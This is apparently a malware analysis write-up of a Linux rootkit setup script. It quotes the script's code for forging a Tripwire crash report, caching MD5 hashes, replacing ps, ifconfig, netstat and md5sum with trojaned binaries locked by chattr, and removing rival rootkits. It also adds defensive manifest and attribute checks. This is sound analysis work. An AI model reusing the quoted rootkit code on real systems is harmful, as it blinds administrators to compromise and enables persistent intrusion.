```sh
echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
if [ -d /etc/tripwire ]; then
    echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"
    if [ -f /var/lib/tripwire/$uname.twd ]; then
        chattr -isa $twd
        echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
        echo "${RED} ALERT! tripwire database found ${RES}"
        echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
        echo "-----------------------------------------" > $twd
        echo "Tripwire segment-faulted !" >> $twd
        echo "-----------------------------------------" >> $twd
        echo "" >> $twd
        echo "The reasons for this may be: " >> $twd
        echo "" >> $twd
        echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
        echo "corrupted files while checking for possible change etc." >> $twd
        echo ""
        echo "pls. rerun tripwire to build the database again!" >> $twd
        echo "" >> $twd
    else
        echo "${WHI} lucky you: Tripwire database not found. ${RES}"
    fi
else
    echo "${WHI} guess not. ${RES}"
fi
```
For those not familiar with it, Tripwire is designed to monitor system files for unauthorized tampering.
The above code, in all its simplistic glory, effectively negates any protection offered by Tripwire. It simply overwrites the Tripwire database with a fake crash report, so the administrator believes the database was lost to a disk error and, as the fake report helpfully suggests, rebuilds it, taking a fresh baseline of files the rootkit is about to replace.
Later on, the same setup script records the MD5 hash of certain key system binaries before the malware is installed:
```sh
# Say hello to md5sum fixer boys n gurls !
if [ -f /sbin/ifconfig ]; then
    /usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
    /usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
    /usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
    /usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
    /usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
    /usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
    /usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
    /usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
    /usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
    /usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi
```
The setup script then backs up the current system binaries and replaces them with trojaned copies.
Even md5sum itself is replaced with a custom copy that, for the files listed above, returns the original hash values recorded earlier:
```sh
# Backdoor ps/top/du/ls/netstat/etc..
cd $BASEDIR/bin
BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP

# ps ...
if [ -f /usr/bin/ps ]; then
    chattr -isa /usr/bin/ps
    cp /usr/bin/ps $BACKUP
    mv -f ps /usr/bin/ps
    chattr +isa /usr/bin/ps
fi
if [ -f /bin/ps ]; then
    chattr -isa /bin/ps
    cp /bin/ps $BACKUP
    mv -f ps /bin/ps
    chattr +isa /bin/ps
fi

# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig
chattr +isa /sbin/ifconfig

# netstat ...
if [ -f /usr/sbin/netstat ]; then
    chattr -isa /usr/sbin/netstat
    mv -f netstat /usr/sbin/netstat
    chattr +isa /usr/sbin/netstat
fi

# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum
chattr +isa /usr/bin/md5sum
```
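As an added example (not part of the original post or of the setup script under analysis), here is the kind of manifest check that sidesteps both tricks shown so far: the expected hashes live off-host, and the hash tool is passed in by path so it can be run from read-only media instead of trusting the on-disk md5sum that the rootkit swapped out. The script assumes sha256sum is available, and it builds a constructed temp tree standing in for /bin/ps, /bin/ls and the Tripwire database rather than touching the real system.

```shell
#!/bin/sh
# Added example (not from the original post or the rootkit's setup script):
# verify system binaries and the Tripwire database against a manifest kept
# off-host, using a hash tool supplied by path (ideally from read-only media).
# Manifest format assumed here: "<sha256>  <path>" (sha256sum style).

# hash_file TOOL PATH -> prints the hex digest of PATH as computed by TOOL
hash_file() {
    "$1" "$2" | awk '{ print $1 }'
}

# verify_manifest TOOL MANIFEST -> one line per entry:
#   "OK <path>", "MODIFIED <path>" or "MISSING <path>"
# Returns 1 if anything was modified or missing, 0 otherwise.
verify_manifest() {
    tool=$1
    manifest=$2
    status=0
    while read -r expected path; do
        [ -n "$path" ] || continue
        if [ ! -f "$path" ]; then
            echo "MISSING $path"
            status=1
            continue
        fi
        actual=$(hash_file "$tool" "$path")
        if [ "$actual" = "$expected" ]; then
            echo "OK $path"
        else
            echo "MODIFIED $path"
            status=1
        fi
    done < "$manifest"
    return $status
}

# run_demo: constructed scenario (stand-ins for /bin/ps, /bin/ls and the
# Tripwire database in a temp dir). Records a manifest, then performs the
# same kind of swap the setup script does ("mv -f ps /bin/ps") and verifies.
# Returns verify_manifest's status so the tampering is visible to callers.
run_demo() {
    tool=${HASH_TOOL:-sha256sum}   # assumption: sha256sum is on PATH
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/var/lib/tripwire"
    printf 'original ps binary\n' > "$root/bin/ps"
    printf 'original ls binary\n' > "$root/bin/ls"
    printf 'tripwire database\n'  > "$root/var/lib/tripwire/host.twd"
    manifest="$root/manifest.sha256"
    for f in "$root/bin/ps" "$root/bin/ls" "$root/var/lib/tripwire/host.twd"; do
        printf '%s  %s\n' "$(hash_file "$tool" "$f")" "$f"
    done > "$manifest"
    # Simulate the rootkit replacing ps after the baseline was taken
    printf 'trojaned ps binary\n' > "$root/bin/ps"
    verify_manifest "$tool" "$manifest" && rc=0 || rc=$?
    rm -rf "$root"
    return $rc
}

# Run as "sh thisfile.sh demo" to see the constructed scenario flag ps.
if [ "${1:-}" = "demo" ]; then
    run_demo
fi
```

The point of the design is that nothing the attacker controls participates in the verdict: the manifest is not on the box, the hash tool is not the on-disk md5sum, and the algorithm is not the one whose values the rootkit cached. A MODIFIED line for a file whose on-host md5sum still "matches" is exactly the discrepancy the .shmd5 trick is meant to hide.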
Now that the attacker has a silent foothold on the system, the setup script goes on to check for potentially vulnerable services, and even for other rootkits:
```sh
# CHECKING FOR HOSTILE ROOTKITS/BACKDORS
mkdir $HOMEDIR/.owned
if [ -f /etc/ttyhash ]; then
    chattr -AacdisSu /etc/ttyhash
    rm -rf /etc/ttyhash
fi
if [ -d /lib/ldd.so ]; then
    chattr -isa /lib/ldd.so
    chattr -isa /lib/ldd.so/*
    mv /lib/ldd.so $HOMEDIR/.owned/tk8
    echo "${RED}[${WHI}sh${RED}]# tk8 detected and owned ...!!!! ${RES}"
fi
if [ -d /usr/src/.puta ]; then
    chattr -isa /usr/src/.puta
    chattr -isa /usr/src/.puta/*
    mv /usr/src/.puta $HOMEDIR/.owned/tk7
    echo "${RED}[${WHI}sh${RED}]# tk7 detected and owned ...!!!! ${RES}"
fi
```
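The script leaves two kinds of traces a defender can sweep for: it sets the immutable and append-only attributes (chattr +isa) on every binary it replaces, and it stashes its backups and its "owned" loot in dot-directories under /usr/lib and /usr/src. The following is an added example (not from the original post or the setup script) with two checks for exactly that; the lsattr lines it parses are constructed sample data, and the hidden-directory scan takes a root path so it can be run against a mounted image or a constructed tree.

```shell
#!/bin/sh
# Added example (not from the original post or the rootkit's setup script):
# sweep for the attribute and directory traces the setup script leaves behind.

# immutable_paths: reads lsattr(1) output on stdin ("<flags> <path>") and
# prints each path whose flag field contains 'i' (immutable) or 'a'
# (append-only). Distros do not ship /bin or /usr/bin binaries with these set.
immutable_paths() {
    awk '$1 ~ /[ia]/ { $1 = ""; sub(/^ /, ""); print }'
}

# hidden_dirs ROOT: prints dot-directories under ROOT/usr/lib, ROOT/lib and
# ROOT/usr/src, the locations this family uses (/usr/lib/libsh/.backup,
# /usr/src/.puta, ...). ROOT is "/" on a live host or a mount point for an image.
hidden_dirs() {
    root=$1
    for sub in usr/lib lib usr/src; do
        if [ -d "$root/$sub" ]; then
            find "$root/$sub" -type d -name '.*'
        fi
    done
}

# demo_lsattr_output: constructed stand-in for "lsattr /bin/* /sbin/* ..." on
# a host the script above has been run on (real flag fields may differ in width).
demo_lsattr_output() {
    printf '%s\n' \
        '--------------e------- /bin/ls' \
        '----i---------e------- /bin/ps' \
        '----i---------e------- /sbin/ifconfig' \
        '----ia--------e------- /usr/bin/md5sum' \
        '--------------e------- /bin/cat'
}

# demo_hidden_dirs: builds a constructed tree in a temp dir with one benign
# directory and two rootkit-style hidden ones, then runs hidden_dirs over it.
demo_hidden_dirs() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/lib/libsh/.backup" "$root/usr/lib/python3" \
             "$root/usr/src/.puta" "$root/lib/modules"
    hidden_dirs "$root"
    rm -rf "$root"
}

# Run as "sh thisfile.sh demo" to see both checks on the constructed data.
if [ "${1:-}" = "demo" ]; then
    demo_lsattr_output | immutable_paths
    demo_hidden_dirs
fi
```

On a live host, feed the first check with `lsattr /bin/* /sbin/* /usr/bin/* /usr/sbin/* 2>/dev/null | immutable_paths`; the attribute check only works on ext filesystems, and like every on-host check it should be run with tools from trusted media, since this same script replaces ls, find and friends.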
Make no mistake - today's attackers are smart. They will do whatever they can to keep a foothold on compromised systems, including blocking access by other attackers.
If you're interested in seeing more, you can view the full setup script at the CaffSec Malware Analysis Google Code site.